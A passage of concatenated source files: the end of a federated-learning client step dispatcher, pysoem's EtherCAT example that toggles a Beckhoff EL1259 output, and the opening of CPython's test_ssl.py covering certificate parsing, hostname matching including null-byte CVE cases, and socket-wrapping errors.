self.std_error_linear_step()
elif self.project_step == SplinkProjectStep.STD_ERROR_LOGISTIC:
self.std_error_logistic_step()
elif self.project_step == HyFedProjectStep.RESULT:
super().result_step() # the result step downloads the result file as zip (it is algorithm-agnostic)
elif self.project_step == HyFedProjectStep.FINISHED:
super().finished_step() # The operations in the last step of the project is algorithm-agnostic
super().post_compute_local_parameters() # # MUST be called AFTER step functions
except Exception as computation_exception:
self.log(computation_exception)
super().post_compute_local_parameters()
self.set_operation_status_failed()
|
basic_example.py | """Toggles the state of a digital output on an EL1259.
Usage: python basic_example.py <adapter>
This example expects a physical slave layout according to
_expected_slave_layout, see below.
"""
import sys
import struct
import time
import threading
from collections import namedtuple
import pysoem
class BasicExample:
BECKHOFF_VENDOR_ID = 0x0002
EK1100_PRODUCT_CODE = 0x044c2c52
EL3002_PRODUCT_CODE = 0x0bba3052
EL1259_PRODUCT_CODE = 0x04eb3052
def __init__(self, ifname):
self._ifname = ifname
self._pd_thread_stop_event = threading.Event()
self._ch_thread_stop_event = threading.Event()
self._actual_wkc = 0
self._master = pysoem.Master()
self._master.in_op = False
self._master.do_check_state = False
SlaveSet = namedtuple('SlaveSet', 'name product_code config_func')
self._expected_slave_layout = {0: SlaveSet('EK1100', self.EK1100_PRODUCT_CODE, None),
1: SlaveSet('EL3002', self.EL3002_PRODUCT_CODE, None),
2: SlaveSet('EL1259', self.EL1259_PRODUCT_CODE, self.el1259_setup)}
def el1259_setup(self, slave_pos):
slave = self._master.slaves[slave_pos]
slave.sdo_write(0x8001, 2, struct.pack('B', 1))
rx_map_obj = [0x1603,
0x1607,
0x160B,
0x160F,
0x1611,
0x1617,
0x161B,
0x161F,
0x1620,
0x1621,
0x1622,
0x1623,
0x1624,
0x1625,
0x1626,
0x1627]
rx_map_obj_bytes = struct.pack(
'Bx' + ''.join(['H' for i in range(len(rx_map_obj))]), len(rx_map_obj), *rx_map_obj)
slave.sdo_write(0x1c12, 0, rx_map_obj_bytes, True)
slave.dc_sync(1, 10000000)
def _processdata_thread(self):
while not self._pd_thread_stop_event.is_set():
self._master.send_processdata()
self._actual_wkc = self._master.receive_processdata(10000)
if not self._actual_wkc == self._master.expected_wkc:
print('incorrect wkc')
time.sleep(0.01)
def _pdo_update_loop(self):
self._master.in_op = True
output_len = len(self._master.slaves[2].output)
tmp = bytearray([0 for i in range(output_len)])
toggle = True
try:
while 1:
if toggle:
tmp[0] = 0x00
else:
tmp[0] = 0x02
self._master.slaves[2].output = bytes(tmp)
toggle ^= True
time.sleep(1)
except KeyboardInterrupt:
# ctrl-C abort handling
print('stopped')
def run(self):
self._master.open(self._ifname)
if not self._master.config_init() > 0:
self._master.close()
raise BasicExampleError('no slave found')
for i, slave in enumerate(self._master.slaves):
if not ((slave.man == self.BECKHOFF_VENDOR_ID) and
(slave.id == self._expected_slave_layout[i].product_code)):
self._master.close()
raise BasicExampleError('unexpected slave layout')
slave.config_func = self._expected_slave_layout[i].config_func
slave.is_lost = False
self._master.config_map()
if self._master.state_check(pysoem.SAFEOP_STATE, 50000) != pysoem.SAFEOP_STATE:
self._master.close()
raise BasicExampleError('not all slaves reached SAFEOP state')
self._master.state = pysoem.OP_STATE
check_thread = threading.Thread(target=self._check_thread)
check_thread.start()
proc_thread = threading.Thread(target=self._processdata_thread)
proc_thread.start()
self._master.write_state()
all_slaves_reached_op_state = False
for i in range(40):
self._master.state_check(pysoem.OP_STATE, 50000)
if self._master.state == pysoem.OP_STATE:
all_slaves_reached_op_state = True
break
if all_slaves_reached_op_state:
self._pdo_update_loop()
self._pd_thread_stop_event.set()
self._ch_thread_stop_event.set()
proc_thread.join()
check_thread.join()
self._master.state = pysoem.INIT_STATE
# request INIT state for all slaves
self._master.write_state()
self._master.close()
if not all_slaves_reached_op_state:
raise BasicExampleError('not all slaves reached OP state')
@staticmethod
def _check_slave(slave, pos):
if slave.state == (pysoem.SAFEOP_STATE + pysoem.STATE_ERROR):
print(
'ERROR : slave {} is in SAFE_OP + ERROR, attempting ack.'.format(pos))
slave.state = pysoem.SAFEOP_STATE + pysoem.STATE_ACK
slave.write_state()
elif slave.state == pysoem.SAFEOP_STATE:
print(
'WARNING : slave {} is in SAFE_OP, try change to OPERATIONAL.'.format(pos))
slave.state = pysoem.OP_STATE
slave.write_state()
elif slave.state > pysoem.NONE_STATE:
if slave.reconfig():
slave.is_lost = False
print('MESSAGE : slave {} reconfigured'.format(pos))
elif not slave.is_lost:
slave.state_check(pysoem.OP_STATE)
if slave.state == pysoem.NONE_STATE:
slave.is_lost = True
print('ERROR : slave {} lost'.format(pos))
if slave.is_lost:
if slave.state == pysoem.NONE_STATE:
if slave.recover():
slave.is_lost = False
print(
'MESSAGE : slave {} recovered'.format(pos))
else:
slave.is_lost = False
print('MESSAGE : slave {} found'.format(pos))
def _check_thread(self):
while not self._ch_thread_stop_event.is_set():
if self._master.in_op and ((self._actual_wkc < self._master.expected_wkc) or self._master.do_check_state):
self._master.do_check_state = False
self._master.read_state()
for i, slave in enumerate(self._master.slaves):
if slave.state != pysoem.OP_STATE:
self._master.do_check_state = True
BasicExample._check_slave(slave, i)
if not self._master.do_check_state:
print('OK : all slaves resumed OPERATIONAL.')
time.sleep(0.01)
class BasicExampleError(Exception):
def __init__(self, message):
super(BasicExampleError, self).__init__(message)
self.message = message
if __name__ == '__main__':
print('basic_example started')
if len(sys.argv) > 1:
try:
BasicExample(sys.argv[1]).run()
except BasicExampleError as expt:
print('basic_example failed: ' + expt.message)
sys.exit(1)
else:
print('usage: basic_example ifname')
sys.exit(1)
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
WRONG_CERT = data_file("wrongcert.pem")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Jan 17 19:09:06 2028 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': 'F9BA076D5B6ABD9B',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 28 19:09:06 2027 GMT',
'notBefore': 'Jan 19 19:09:06 2018 GMT',
'serialNumber': '82EDBF41C880919C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
client_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
